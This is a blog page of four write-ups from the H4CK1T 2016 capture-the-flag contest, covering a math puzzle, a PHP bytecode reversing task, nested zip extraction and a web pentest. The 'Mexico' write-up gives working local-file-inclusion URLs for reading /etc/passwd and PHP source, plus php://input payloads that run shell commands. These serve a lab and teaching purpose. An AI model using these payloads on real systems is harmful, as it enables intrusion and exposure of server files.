Writeups

[H4CK1T 2016] HellMath – Mongolia Writeup

Standard

Description:

HellMath – Mongolia – 100 – PPC – NEW

EN: Somebody thinks that you are able to calculate well. Is it true? Pass this task, prove the abilities and maybe we will recommend you to one of the most secret missions in this war.

# nc ctf.com.ua 9988 #

This one was a tricky question. Sometime we tend to think too complicated that we forget the basics of the basics.

Let’s begin. We are given with a netcat command. Let’s run it and see what will happen:

Megabeets: /tmp/h4ck1t/# nc ctf.com.ua 9988
Hello, stranger!
In this task you must solve 100 math questions.
Every task prints value C, where

C = A ^ B
and you need to return A and B.
Simple, isn't it?

C =  902688766290655704373689275053375955411443638316509920323848941975222889419457168696920458154297992623673837270038581569454814243805830583810239007096636651566143112784253577358992076929281284042240081518611899927486014041391480636127371844583712500925858241436577687881647483088199415935267570657867465207599620844695004309619118983781089160978919651087719815749856394166367766706778110070467678821838496167634418163901082752730509337302890389749997313424181834067339889277882795763685153563883836605864618300712713269080489519361527692457350059854544553090827217232806958474200121801180519077734723322730821821456307012680580248247037218481409333193782453105202353618778481032198022578852166518606909721942977575590954265237839696664727220865292977163448587698573864445402565395985502519681641780784380764161304054798829812233490916257278759562538568573426337720533085242758348167474155869479478584700074966635983754095730722241717146186660268605302301836193395575194171496181059843678720055443249024604241326634039569309251564445571858850712209536694524027635248909838940066204355066967778407959555544148932174508982884171285719680370353907943024211899094303816973257264835368157414233144693065775543775665646374894255716733398422962657186374363379853482641303616490385754787152837430574499189926206208167378653776600678668050752826349915972573133077173212387799225263508329369454811848100118727431542734051975488119495581578101088438806260901755298558179381970655381433179960687477909164284017317873303284836205753800005799794061481880410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Well, We are given with a number C and we need to find numbers A and B that A^B (Power, not XOR) gives C.

At the beginning I tried to find algorithms online, “Such algorithms must exist!” I thought to myself. I found nothing and gave up for the day because it was late and I wanted to sleep. I was in my bed while message a friend the question and he simply answered:
“Did you tried 1?”
– “What 1?”
 “You know, every number power 1 equals the number” (i.e C = C^1)
– “OMG! It is so simple! You are the smartest person on earth!”

 

So I ran to my computer and wrote this short python script that gave me the flag:

from pwn import *
from time import sleep

r = remote('ctf.com.ua', 9988)
 
print r.recvuntil('?')
print r.recvline()

counter=0

while True:	
	if counter==100:
		print r.recv()
	q = r.recvline()
	c = q[5:].rstrip('\n')
	print q
	print "\n----------\n"
	print c

	ans = '%s 1'%c
	print ans
	r.send('%s\n'%ans)
	counter+=1
	
# Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}

Flag: h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}

 

megabeets_inline_logoEat Veggies

[H4CK1T 2016] Pentest – Mexico Writeup

Standard

Description:

Task: Remote pentest – Mexico – 150 – Web

Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack .Good luck !
http://91.231.84.36:9150/

YAY! Web challenge! If you are following my blog (If not, the subscribe form is on left) you already know how much I love web challenges, It’s either easy points or great puzzle.

Let’s open the website and see what we have:

h4ck1t_mexico1

WOW! JUSTICE LEAGUE! Did I mentioned that I love comic books and especially Batman? Oh, Not yet?

Well, this challenge is going to be awesome. No. It’s already awesome!

OK, deep breath. Let’s start. See that menu on the bottom? Let’s click on some link to see what will happen.

h4ck1t_mexico2

Look at the URL, the “about” page is included by the “index.php” using php commands ‘require’ or ‘include’. When we see something like that in a challenge we can check if the site is vulnerable to LFI attack. In Local File Inclusion attack we can include pages from the local server. Let’s try to include /etc/passwd to check for the existence of the vulnerability

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd

Didn’t work. Let’s try to add null byte at the end

http://91.231.84.36:9150/index.php?page=../../../../etc/passwd%00

h4ck1t_mexico3

It worked! We successfully got the /etc/passwd file. So what now? Let’s try to read the pure php file to see if the flag is in the php pages.

We can use php://filter to print the content of index.php in base64 format. We need to encode the content because we don’t want the php engine to compile the php parts of the code.

http://91.231.84.36:9150/index.php?page=php://filter/convert.base64-encode/resource=index

We got encoding page, now let’s decode it and see if we find a flag . I deleted some content to decrease the size of the code in the post.

<?php
    if ($_GET["page"]) {
    $file = $_GET["page"].".php";
    // simulate null byte issue
    $file = preg_replace('/\x00.*/',"",$file);
        include($file);
    } 
    else
    {
        echo '    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-12">
                <h1>The Big Picture</h1>
                <p>Welcome to the Big Picture. This fantastic digital resource combines the best of formal and informal learning. 
If you are already using The Big Picture, you can register for and access exclusive extra material from this platform. 
This is The Big Picture: have you experienced it yet?  </p> 
            </div>
        </div>';
    }
    //flag{h@h@h@_man_n1ce_try} 

?>
<!DOCTYPE html>
<html class="full" lang="en">
<head>

...
...
...

    </div>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>

</body>

</html>

 

Nope. No flag. The “flag{…}” thing isn’t really the flag because the flag in this CTF should be in h4ck1t{…} format.
Also the other pages like ‘about’ and ‘contact’ is not contain any flag. So we probably need to perform LFI to RCE (Remote Code Execution) attack. We can use the php://input method to send php commands through Post requests. Using Firefox Hackbar plugin we can do it easily.
Put the URL to be http://91.231.84.36:9150/index.php?page=php://input  And the POST data to be

<?  system('ls') ;?>

h4ck1t_mexico4

Success. We got the RCE and we now know about a new secret file. Let’s read it using the same way but this time with

 <?  system('cat file') ;?>

And we got the flag 🙂

Flag: h4ck1t{g00d_rfi_its_y0ur_fl@g}

megabeets_inline_logoEat Veggies

[H4CK1T 2016] PhParanoid – Malaysia Writeup

Standard

 

Description:

Task: PhParanoid – Malaysia – 225 – Rever$e

EN: I am so paranoid! I try to hide everything from this mad world! I have already obfuscated my calculator sources, my javascript site sources and I`m not going to stop! And u will never know what I hide, haha!

In this challenge we got Phb, i.e php file that compiled using BCompiler (PHP Bytecode Compiler). We can Decompile it using this.

The decompilation process is very simple and we easily got this php file (I deleted repeated parts to decrease size):

<?php
$secret ="The";
do {
	$is_secret_exists = false;

	if (isset($secret)) {
		$is_secret_exists = true;
	}
	else {
		break;
	}

	$is_secret_valid = false;
	if (strstr($secret, "The") && (strpos($secret, "The") == 0)) {
		$is_secret_valid = true;
		echo $secret;
	}

	$c0 = chr(ord($secret[0]) + 20);

	if ((ord($c0) + (-20)) != 84) {
		unset($c0);
		break;
	}

	$c1 = chr(ord($secret[1]) + (-52));

	if ((ord($c1) + 52) != 104) {
		unset($c1);
		break;
	}
	
		...
		...
		...

	$c43 = chr(ord($secret[43]) + (-35));

	if ((ord($c43) + 35) != 103) {
		unset($c43);
		break;
	}

	$c44 = chr(ord($secret[44]) + 79);

	if ((ord($c44) + (-79)) != 46) {
		unset($c44);
		break;
	}
} while (false);

?>

 

So what we have here is a manipulation on char codes to check if the secret variable is valid. Let’s find out which char codes we need to use in order to find the flag.

Every if statement in the code looks like the following code. I added a comments for explanation

# the first character of the flag is the first character of the 'secret' + 20
$c0 = chr(ord($secret[0]) + 20);

# check if the char code of the first character of the flag -20 equals 84
if ((ord($c0) + (-20)) != 84) {
	unset($c0);
	break;
}

So, from this we can assume that the flag starts with chr(20+84) which is ‘h’. Make sense because we know that the flag is starting with “h4ck1t{“. I made some manipulation on the script (Lot of replaces in Notepad++ to keep only the relevant char codes) to create a list of the char codes and then converted them to chars with python.

>>> charcodes = [+20 +84,-52 +104,-2 +101,-7 +114,-52 +101,+43 +73,+8 +115,+1 +78,-63 +111,+22 +82,-10 +105,-55 +103,+8 +104,-49 +116,-17 +65,-42 +110,-49 +100,-34 +87,-19 +114,-40 +111,-62 +110,+13 +103,+49 +46,-35 +84,-26 +104,-48 +101,-65 +114,-33 +101,-28 +79,-15 +110,-31 +108,-16 +121,+8 +70,-66 +117,-15 +110,-12 +65,-61 +110,-33 +100,+9 +66,-16 +111,-37 +114,-56 +105,+0 +110,-35 +103,+79 +46]
>>> flag = ''
>>>
>>> for c in charcodes:
...     flag+=chr(c)
...
>>> print flag
h4ck1t{O0h_0pC0D35_G0t_1N51D3_MiN3_51CK_M1nD}

 

megabeets_inline_logoEat Veggies

[H4CK1T 2016] Hex0gator – Paraguay Writeup

Standard

Description:

EN: All Experts of The Silver Shield Project can’t decipher the intercepted data. Who knows, maybe you can do it?
100_00edb54bed7e46bd5cdb7c06059881c2

 

In this PPC 250 pts challenge we got only one file. Let’s run File command on it to determine it’s type.

Megabeets:/tmp/h4ckit/paraguay# file 100_00edb54bed7e46bd5cdb7c06059881c2
100_00edb54bed7e46bd5cdb7c06059881c2: Zip archive data, at least v2.0 to extract

 

This is a zip file which contains another folder within. The folder contains a file named ‘99‘. Let’s extract it and figure out it’s type:

Megabeets:/tmp/h4ckit/paraguay# file 99
99: Zip archive data, at least v1.0 to extract

99 is also a zip file, and inside it has another zip, and another zip… well, I see where it going to. I wrote a simple Powershell script to extract all the archives using the ultimate archive manipulator – 7-zip.

# Set $path to a folder only with the file '99'
# 99 Exists in 'work_folder' inside the first archive

$path = "C:\\your\\\path"

while($true)
{
    $file = (gci $path)[0]
    &'C:\Program Files\7-Zip\7z.exe' e $file.Fullname -y > $null
    if($file.Name -eq 'flag')
    {
        # print the content of the file
        gc $file
        break;

    }
    else
    {
        Remove-Item $file.Fullname
    }
}

Now let’s run it:

PS C:\h4ckit\paraguay> C:\h4ckit\paraguay\solve.ps1
FLAG: 0W_MY_G0D_Y0U_M4D3_1T

 

megabeets_inline_logoEat Veggies